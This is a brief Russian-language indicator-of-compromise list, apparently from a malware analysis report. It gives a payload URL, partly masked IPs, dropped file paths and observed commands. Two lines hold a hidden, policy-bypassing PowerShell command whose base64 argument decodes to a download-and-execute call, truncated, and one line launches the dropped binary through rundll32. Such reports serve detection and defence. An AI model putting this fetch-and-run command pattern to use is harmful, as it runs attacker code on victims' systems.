Техническая информация
- http://46.#.19.136/boogyman.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\gah.bin
- '46.#.19.136':80
- '10#.#45.146.219':80
- '74.##.157.139':443
- '20#.#38.26.60':443
- 'microsoft.com':80
- '15#.#8.23.192':443
- '20#.#38.26.60':443
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- '<SYSTEM32>\rundll32.exe' %TEMP%\GAh.bin StartW
- '<SYSTEM32>\wermgr.exe'